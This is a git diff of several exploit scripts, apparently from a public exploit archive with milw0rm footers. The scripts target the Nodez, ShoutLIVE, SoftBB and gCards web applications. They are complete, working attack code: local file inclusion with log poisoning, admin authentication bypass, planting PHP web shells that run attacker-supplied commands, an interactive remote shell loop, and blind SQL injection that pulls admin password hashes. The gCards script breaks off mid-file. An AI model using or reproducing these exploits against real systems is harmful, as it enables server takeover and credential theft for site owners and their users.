$data.="Content-Disposition: form-data; name=\"step\"\r\n\r\n"; - $data.="finish\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"parent\"\r\n\r\n"; - $data.="../suntzu".$anumber.".php\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"nodez_title\"\r\n\r\n"; - $data.="suntzu".$anumber."\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"nodez_longtitle\"\r\n\r\n"; - $data.="suntzu".$anumber."\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"nodez_body\"\r\n\r\n"; - $data.="<?php if(get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}echo 666;\r\n"; - $data.="passthru(\$_GET[cmd]);echo 666;?>\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"author\"\r\n\r\n"; - $data.="suntzu\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"areg\"\r\n\r\n"; - $data.="0\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"mood\"\r\n\r\n"; - $data.="\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $data.="Content-Disposition: form-data; name=\"music\"\r\n\r\n"; - $data.="\r\n"; - $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; - $packet ="POST ".$p."index.php? HTTP/1.1\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n"; - $packet.="Cookie:".$cookie."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Content-Type: multipart/form-data; boundary=----------lNnHj26YsSTIS0qSMhw5MK\r\n\r\n"; - $packet.=$data; - #echo quick_dump($packet); - sendpacketii($packet); - - echo "[7] Launch commands...\r\n\r\n"; - $packet ="GET ".$p."suntzu".$anumber.".php?cmd=".$cmd." 
HTTP/1.0\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - #echo quick_dump($packet); - sendpacketii($packet); - if (strstr($html,"666")) - { - echo "Exploit succeeded...\r\n\r\n"; - $temp=explode("666",$html); - echo $temp[1]; - die; - } -} -else -{die ("Wrong action...\r\n");} -//if you are here... -echo "Exploit failed...\r\n"; -?> - -# milw0rm.com [2006-03-18] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "Nodez 4.6.1.1 Mercury (possibly prior versions) multiple vulnerabilities\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n\r\n"; + +/* + software: + site: nodez.greentinted.com/ + description: Nodez - "An open source (content management system), designed to + be flexible, expandable, and as modular as possible." (ndr: maybe too modular ;) ) + + short explaination: + i) 'op','bop','ext','eop' arguments are not properly sanitized before to + include files from local resources. You can include arbitrary files + breaking the path through a null char (%00). 
Also you can inject + php code in cache/ext/statman/log.gtdat file and launch commands + including it, poc: + + http://[target]/[path]/index.php?node=system&op=extop&ext=statman&eop=/visitor&ip=[code] + + http://[target]/[path]/index.php?node=system&op=blockop&block=3&bop=../../../../cache/ext/statman/log.gtdat%00 + http://[target]/[path]/index.php?node=system&op=../../../cache/ext/statman/log.gtdat%00 + http://[target]/[path]/index.php?node=system&op=extop&ext=statman&eop=../../../../cache/ext/statman/log.gtdat%00 + http://[target]/[path]/index.php?node=system&op=extop&ext=../../cache/ext/statman/log.gtdat%00 + + ii) + to list all files on target system: + http://[target]/[path_to_nodez]/countlines.php + + iii)last but not least, the most chritical issue: + + you can view all admin/users md5 password hashes, ex: + + http://[target]/[path_to_nodez]/cache/users/list.gtdat + + (if you do not believe it, give a look to the online demo: + http://demo.opensourcecms.com/nodez/cache/users/list.gtdat) + + this because nodez do not provide an .htaccess file for users folder + + you don't need to force it to login as admin, you can + craft a $_POST['upass'] value,ex: + + [admin_md5_hash][md5("rndval[numbers]")] + + this string should be calculated by a nodez javascript, but + you can easily do by yourself (the second fragment is inside + login page, something like "rndval[random_numbers]" ) + + once you have an admin session cookie, you can create and edit php files + (System options -> Toolbox -> Super Edit) and launch commands from them + + this exploit makes the dirty work for i) and iii) + */ +if ($argc<3) { +echo "Usage: php ".$argv[0]." 
host path action cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to nodez\r\n"; +echo "action: 1 - through arbitrary local inclusion\r\n"; +echo " (works with magic_quotes_gpc= Off)\r\n"; +echo " 2 - through admin authentication bypass\r\n"; +echo " (no php.ini restriction, you need the\r\n"; +echo " list.gtdat file)\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /nodez/ 2 ls -la\r\n"; +echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat\r\n"; +echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat -p81\r\n"; +echo "php ".$argv[0]." localhost /nodez/ 1 cat ./cache/users/list.gtdat -P1.1.1.1:80\r\n"; +die; +} + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +$host=$argv[1]; +$path=$argv[2]; +$action=$argv[3]; +$cmd="";$port=80;$proxy=""; + +for ($i=4; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "action selected -> ".$action."\r\n"; +if ($action=="1") +{ + +echo "[1] Injecting some code in log.gtdat file...\r\n"; +$CODE ='<?php;ob_clean();echo(666);'; //notice the trick to work with short_open_tag off +$CODE.='passthru($_GET[cmd]);echo(666);die;?>'; +$packet="GET ".$p."index.php?node=system&op=extop&ext=statman&eop=/visitor&ip=".$CODE." 
HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: close\r\n\r\n"; +#echo quick_dump($packet); +sendpacketii($packet); +sleep(1); +$xpl=array ( '&op=blockop&block=3&bop=../../../../cache/ext/statman/log.gtdat%00', + '&op=../../../cache/ext/statman/log.gtdat%00', + '&op=extop&ext=statman&eop=../../../../cache/ext/statman/log.gtdat%00', + '&op=extop&ext=../../cache/ext/statman/log.gtdat%00' + ); + +for ($i=0; $i<=count($xpl)-1;$i++) +{ +$a=$i+2; +echo "[".$a."] Trying with ".$xpl[$i]."\r\n"; +$packet="GET ".$p."index.php?cmd=".$cmd."&node=system".$xpl[$i]." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"666")) +{ +echo "Exploit succeeded...\r\n"; +$temp=explode("666",$html); +echo $temp[1]; +die; +} +} +} +else +if ($action=="2") +{ + echo "[1] Looking for list.gtdat file...\r\n"; + $packet="GET ".$p."cache/users/list.gtdat HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"200 OK")) + { echo "Done...we have list.gtdat file\r\n"; + } + else + {die("Exploit failed...");} + $temp=explode(":\"",$html); + $temp2=explode("\"",$temp[1]); + $adm=$temp2[0]; + echo "admin -> ".$adm."\r\n"; + $temp2=explode("\"",$temp[3]); + $hash=$temp2[0]; + echo "hash -> ".$hash."\r\n"; + + echo "[2] Grab some data from login page...\r\n"; + $packet="GET ".$p."index.php HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #echo quick_dump($packet); + sendpacketii($packet); + $temp=explode("+hex_md5('",$html); + $temp2=explode("'",$temp[1]); + echo "our string -> ".$temp2[0]."\r\n"; + $mypass=$hash.md5($temp2[0]); + echo "our passport to heaven ->".$mypass."\r\n"; + $temp=explode("Set-Cookie: ",$html); + $temp2=explode(" ",$temp[1]); + $cookie=$temp2[0]; + echo "cookie -> ".$cookie."\r\n"; + + echo "[3] 
Login...\r\n"; + $data ="uname=".urlencode($adm); + $data.="&upass=".urlencode($mypass); + $data.="&node=system"; + $data.="&ref=node%3Dsystem%26op%3Dlogout"; + $data.="&op=login"; + $packet ="POST ".$p."index.php? HTTP/1.0\r\n"; + $packet.="Host: $host\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Cookie: ".$cookie."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + #echo quick_dump($packet); + sendpacketii($packet); + if (eregi("Welcome back",$html)) {echo "Logged in...\r\n";} + else {die("Exploit failed...\r\n");} + srand(make_seed()); + $anumber = rand(1,99999); + + echo "[4] Let's create a nodez id...\r\n"; + $packet ="GET ".$p."?node=system&op=advanced/superedit&step=edit&id=suntzu".$anumber." HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: ".$cookie."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #echo quick_dump($packet); + sendpacketii($packet); + + echo "[5] Let's create the php file...\r\n"; + $data ="title=suntzu".$anumber; + $data.="&type=blog"; + $data.="&path=../suntzu".$anumber.".php"; + $data.="&hits=0"; + $data.="&date=now"; + $packet= "POST ".$p."?node=system&op=advanced/superedit&step=save&id=../suntzu".$anumber.".php HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Cookie: ".$cookie."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + #echo quick_dump($packet); + sendpacketii($packet); + + echo "[6] Let's save the evil code ...\r\n"; + $data ="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"node\"\r\n\r\n"; + $data.="system\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"op\"\r\n\r\n"; + $data.="editfile\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + 
$data.="Content-Disposition: form-data; name=\"step\"\r\n\r\n"; + $data.="finish\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"parent\"\r\n\r\n"; + $data.="../suntzu".$anumber.".php\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"nodez_title\"\r\n\r\n"; + $data.="suntzu".$anumber."\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"nodez_longtitle\"\r\n\r\n"; + $data.="suntzu".$anumber."\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"nodez_body\"\r\n\r\n"; + $data.="<?php if(get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}echo 666;\r\n"; + $data.="passthru(\$_GET[cmd]);echo 666;?>\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"author\"\r\n\r\n"; + $data.="suntzu\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"areg\"\r\n\r\n"; + $data.="0\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"mood\"\r\n\r\n"; + $data.="\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $data.="Content-Disposition: form-data; name=\"music\"\r\n\r\n"; + $data.="\r\n"; + $data.="------------lNnHj26YsSTIS0qSMhw5MK\r\n"; + $packet ="POST ".$p."index.php? HTTP/1.1\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n"; + $packet.="Cookie:".$cookie."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Content-Type: multipart/form-data; boundary=----------lNnHj26YsSTIS0qSMhw5MK\r\n\r\n"; + $packet.=$data; + #echo quick_dump($packet); + sendpacketii($packet); + + echo "[7] Launch commands...\r\n\r\n"; + $packet ="GET ".$p."suntzu".$anumber.".php?cmd=".$cmd." 
HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + #echo quick_dump($packet); + sendpacketii($packet); + if (strstr($html,"666")) + { + echo "Exploit succeeded...\r\n\r\n"; + $temp=explode("666",$html); + echo $temp[1]; + die; + } +} +else +{die ("Wrong action...\r\n");} +//if you are here... +echo "Exploit failed...\r\n"; +?> + +# milw0rm.com [2006-03-18] diff --git a/platforms/php/webapps/1590.pl b/platforms/php/webapps/1590.pl index 1c175605d..7df70438a 100755 --- a/platforms/php/webapps/1590.pl +++ b/platforms/php/webapps/1590.pl 
@@ -1,59 +1,59 @@ -#!/usr/bin/perl -################################################## -# ShoutLIVE <= 1.1.0 Remote Php Code Execution -# Based on: http://www.frsirt.com/bulletins/4109 -# Credits: Coded by DarkFig -# Website: http://disarm.free.fr/bo_hard/ -# Greetz: All AcidRoot/Bod members =) -################################################## -use IO::Socket; -use LWP::Simple; - -if(!$ARGV[1]){headers(); -print "\n| Usage: perl shoutlive110.pl <host> <path> | -+---------------------------------------------+ -| Coded by DarkFig | -+------------------+ -";exit} - -sub headers() { -print "\n -+----------------------------------------------+ -| ShoutLIVE <= 1.1.0 Remote Php Code Execution | -+----------------------------------------------+";} - -$host = $ARGV[0]; -$path = $ARGV[1]; -headers(); -$ncon = "\n [-]Can't connect to $host..."; -$ycon = "\n [+]Connected to $host..."; -$sdat = "\n [~]Sending malicious request..."; -$ycmd = "\n [+]System command writed..."; -$req1 = "send_email=0\" ?> <? \$cmd = \$_GET\['cmd']; system(\$cmd); ?> <? 
#"; -$lgr1 = length $req1; -$psti = "$path"."savesettings.php"; - -my $sock = new IO::Socket::INET(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or die "$ncon"; -print "$ycon"."$sdat"; -print $sock "POST $psti HTTP/1.1 -Host: $host -Content-Type: application/x-www-form-urlencoded -Content-Length: $lgr1 - -$req1\n"; -close($sock); -print "$ycmd"; - -while(1 ne 2){ -print "\n [$host]\$ ";chomp($cmd = <STDIN>); -if($cmd eq "exit"){eofi();} -$req2 = "http://"."$host"."$path"."settings.php"."?cmd="."$cmd"; -$page = get($req2) or die "$ncon"; -print $page;} - -sub eofi() { -print "+----------------------------------------------+ -| Coded by DarkFig : [*BoD*]_AcidRoot | -+----------------------------------------------+\n";exit;} - -# milw0rm.com [2006-03-18] +#!/usr/bin/perl +################################################## +# ShoutLIVE <= 1.1.0 Remote Php Code Execution +# Based on: http://www.frsirt.com/bulletins/4109 +# Credits: Coded by DarkFig +# Website: http://disarm.free.fr/bo_hard/ +# Greetz: All AcidRoot/Bod members =) +################################################## +use IO::Socket; +use LWP::Simple; + +if(!$ARGV[1]){headers(); +print "\n| Usage: perl shoutlive110.pl <host> <path> | ++---------------------------------------------+ +| Coded by DarkFig | ++------------------+ +";exit} + +sub headers() { +print "\n ++----------------------------------------------+ +| ShoutLIVE <= 1.1.0 Remote Php Code Execution | ++----------------------------------------------+";} + +$host = $ARGV[0]; +$path = $ARGV[1]; +headers(); +$ncon = "\n [-]Can't connect to $host..."; +$ycon = "\n [+]Connected to $host..."; +$sdat = "\n [~]Sending malicious request..."; +$ycmd = "\n [+]System command writed..."; +$req1 = "send_email=0\" ?> <? \$cmd = \$_GET\['cmd']; system(\$cmd); ?> <? 
#"; +$lgr1 = length $req1; +$psti = "$path"."savesettings.php"; + +my $sock = new IO::Socket::INET(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or die "$ncon"; +print "$ycon"."$sdat"; +print $sock "POST $psti HTTP/1.1 +Host: $host +Content-Type: application/x-www-form-urlencoded +Content-Length: $lgr1 + +$req1\n"; +close($sock); +print "$ycmd"; + +while(1 ne 2){ +print "\n [$host]\$ ";chomp($cmd = <STDIN>); +if($cmd eq "exit"){eofi();} +$req2 = "http://"."$host"."$path"."settings.php"."?cmd="."$cmd"; +$page = get($req2) or die "$ncon"; +print $page;} + +sub eofi() { +print "+----------------------------------------------+ +| Coded by DarkFig : [*BoD*]_AcidRoot | ++----------------------------------------------+\n";exit;} + +# milw0rm.com [2006-03-18] diff --git a/platforms/php/webapps/1594.py b/platforms/php/webapps/1594.py index 8a417feae..7ed1692bd 100755 --- a/platforms/php/webapps/1594.py +++ b/platforms/php/webapps/1594.py 
@@ -1,51 +1,51 @@ -#!/usr/bin/env python -# LOTFREE TEAM 03/2006 -# http://lotfree.next-touch.com/ -# http://membres.lycos.fr/lotfree/sploits/LOTF-SoftBB.py -# -# Vulnerability info -# Product : SoftBB -# Version : 0.1 -# -# The field 'mail' in reg.php is used directly in a SQL query : -# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = "'.add_gpc($pseudoreg).'" OR mail = "'.$mail.'"'; -# We can deduce deduce the result of some sql querys according to the error messages returned -# The exploit test the characters of the md5 hash one by one using a special query -import httplib, urllib - -# Change the following values... -admin="admin" -server="localhost" -path="/forum" -# -hash="" -chars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0') - -print "LOTFREE TEAM SoftBB BruteForcing tool" -print "-------------------------------------" -for i in range(1,33): - print "Brute forcing hash["+str(i)+"]" - for a in chars: - params=urllib.urlencode({'pseudo':admin, - 'mdp':'1', - 'mdpc':'1', - 'mail':'" union select pseudo,1 from softbb_membres where pseudo="'+admin+'" and substr(mdp,'+str(i)+',1)="'+a+'" limit 1,1#', - 'condok':'true'}) - headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} - conn = httplib.HTTPConnection(server) - conn.request("POST", path+"/index.php?page=reg", params, headers) - response = conn.getresponse() - data = response.read() - conn.close() - if data.find("Ce pseudonyme est d")>0: - hash=hash+a - continue - -print -if len(hash)==32: - print "Found hash =",hash,"for account",admin - print "You can use http://md5.rednoize.com/ to crack the md5 hash" -else: - print "Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request..." 
- -# milw0rm.com [2006-03-19] +#!/usr/bin/env python +# LOTFREE TEAM 03/2006 +# http://lotfree.next-touch.com/ +# http://membres.lycos.fr/lotfree/sploits/LOTF-SoftBB.py +# +# Vulnerability info +# Product : SoftBB +# Version : 0.1 +# +# The field 'mail' in reg.php is used directly in a SQL query : +# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = "'.add_gpc($pseudoreg).'" OR mail = "'.$mail.'"'; +# We can deduce deduce the result of some sql querys according to the error messages returned +# The exploit test the characters of the md5 hash one by one using a special query +import httplib, urllib + +# Change the following values... +admin="admin" +server="localhost" +path="/forum" +# +hash="" +chars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0') + +print "LOTFREE TEAM SoftBB BruteForcing tool" +print "-------------------------------------" +for i in range(1,33): + print "Brute forcing hash["+str(i)+"]" + for a in chars: + params=urllib.urlencode({'pseudo':admin, + 'mdp':'1', + 'mdpc':'1', + 'mail':'" union select pseudo,1 from softbb_membres where pseudo="'+admin+'" and substr(mdp,'+str(i)+',1)="'+a+'" limit 1,1#', + 'condok':'true'}) + headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} + conn = httplib.HTTPConnection(server) + conn.request("POST", path+"/index.php?page=reg", params, headers) + response = conn.getresponse() + data = response.read() + conn.close() + if data.find("Ce pseudonyme est d")>0: + hash=hash+a + continue + +print +if len(hash)==32: + print "Found hash =",hash,"for account",admin + print "You can use http://md5.rednoize.com/ to crack the md5 hash" +else: + print "Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request..." + +# milw0rm.com [2006-03-19] diff --git a/platforms/php/webapps/1595.php b/platforms/php/webapps/1595.php index d4c4af7b6..cfc1a4ac8 100755 --- a/platforms/php/webapps/1595.php 
+++ b/platforms/php/webapps/1595.php 
@@ -1,362 +1,362 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "gCards <= 1.45 multiple vulnerabilities\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; -echo "Sun-Tzu:\"At first, then, exhibit the coyness of a maiden, until the\r\n"; -echo "enemy gives you an opening; afterwards emulate the rapidity of a\r\n"; -echo "running hare, and it will be too late for the enemy to oppose you.\"\r\n"; - -echo "dork: \"powered by gcards\"\r\n\r\n"; - -/* - -explaination: -software site: http://www.gregphoto.net/gcards/index.php - -i) vulnerable code in inc/setLang.php: - -<? - if ($page->languageredirect == $_SERVER['PHP_SELF']) { - if (isset($_GET['setLang'])) $_SESSION['setLang'] = $_GET['setLang']; - } - - $langFile = $page->relpath.'inc/lang/'.$lang[$_SESSION['setLang']]['file']; - - if (file_exists($langFile)) { - include_once($langFile); - } - else { - echo "Could not find language file $langFile"; - } -?> - -this code is included by main script, so ... arbitrary local inclusion, poc: - -http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=../../../../../../../../../../../var/log/httpd/access_log - -this works regardless of any magic_quotes_gpc settings, apart open_basedir -restrictions obviously - -ii) also we have SQL injection in admin authentication procedure, admin/loginfunction.php -at lines 28-38: - -... - $username = $_POST['username']; - $userpass = $_POST['userpass']; - if ($username && $userpass) - { - include('../inc/adodb/adodb.inc.php'); # load code common to ADOdb - include('../config.php'); - $ADODB_FETCH_MODE = ADODB_FETCH_ASSOC; - $conn = &ADONewConnection('mysql'); # create a connection - $conn->Connect($dbhost,$dbuser,$dbpass,$dbdatabase); - $pass = md5($userpass); - $sqlstmt = "SELECT role FROM ".$tablePrefix."cardusers WHERE username='$username' AND userpass='$pass'"; -... 
- -login as admin typing: - -username: 'or'suntzu'='suntzu'/* -password: [whatever] - -this works with magic_quotes_gpc=Off - -once you are admin, you can upload php files, files are renamed but gcards keep -php extension, so you can launch commands from them - -iii)xss: - -http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E - -this exploit does the dirty work for i) and ii) - - */ -if ($argc<5) { -echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to gcards\r\n"; -echo "action: 1 - launch commands through arbitrary local inclusion\r\n"; -echo " (no php.ini restriction)\r\n"; -echo " 2 - launch commands through sql injection/admin auth bypass\r\n"; -echo " (works with magic_quotes_gpc = Off\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /gcards/ 2 cat ./../config.php\r\n"; -echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php\r\n"; -echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -p81\r\n"; -echo "php ".$argv[0]." 
localhost /gcards/ 1 cat config.php -P1.1.1.1:80\r\n"; -die; -} - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - -$host=$argv[1]; -$path=$argv[2]; -$action=$argv[3]; -$cmd="";$port=80;$proxy=""; - -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -echo "action selected -> ".$action."\r\n"; -if ($action=="1") -{ - echo "[1] Injecting some code in log files...\r\n"; - $CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}'; - $CODE.='passthru($_GET[cmd]);echo 666;die;?>'; - $packet.="GET ".$p.$CODE." 
HTTP/1.1\r\n"; - $packet.="User-Agent: ".$CODE."\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: close\r\n\r\n"; - #debug - #echo quick_dump($packet); - sendpacketii($packet); - - # fill with possible locations - $paths= array ( - "../../../../../../../../../../var/log/httpd/access_log", - "../../../../../../../../../../var/log/httpd/error_log", - "../apache/logs/error.log", - "../apache/logs/access.log", - "../../apache/logs/error.log", - "../../apache/logs/access.log", - "../../../apache/logs/error.log", - "../../../apache/logs/access.log", - "../../../../apache/logs/error.log", - "../../../../apache/logs/access.log", - "../../../../../../../../../../etc/httpd/logs/acces_log", - "../../../../../../../../../../etc/httpd/logs/acces.log", - "../../../../../../../../../../etc/httpd/logs/error_log", - "../../../../../../../../../../etc/httpd/logs/error.log", - "../../../../../../../../../../var/www/logs/access_log", - "../../../../../../../../../../var/www/logs/access.log", - "../../../../../../../../../../usr/local/apache/logs/access_log", - "../../../../../../../../../../usr/local/apache/logs/access.log", - "../../../../../../../../../../var/log/apache/access_log", - "../../../../../../../../../../var/log/apache/access.log", - "../../../../../../../../../../var/log/access_log", - "../../../../../../../../../../var/www/logs/error_log", - "../../../../../../../../../../var/www/logs/error.log", - "../../../../../../../../../../usr/local/apache/logs/error_log", - "../../../../../../../../../../usr/local/apache/logs/error.log", - "../../../../../../../../../../var/log/apache/error_log", - "../../../../../../../../../../var/log/apache/error.log", - "../../../../../../../../../../var/log/access_log", - "../../../../../../../../../../var/log/error_log" - ); - - for ($i=0; $i<=count($paths)-1; $i++) - { - $j=$i+2; - echo "[".$j."] Trying with ".$paths[$i]."\r\n"; - 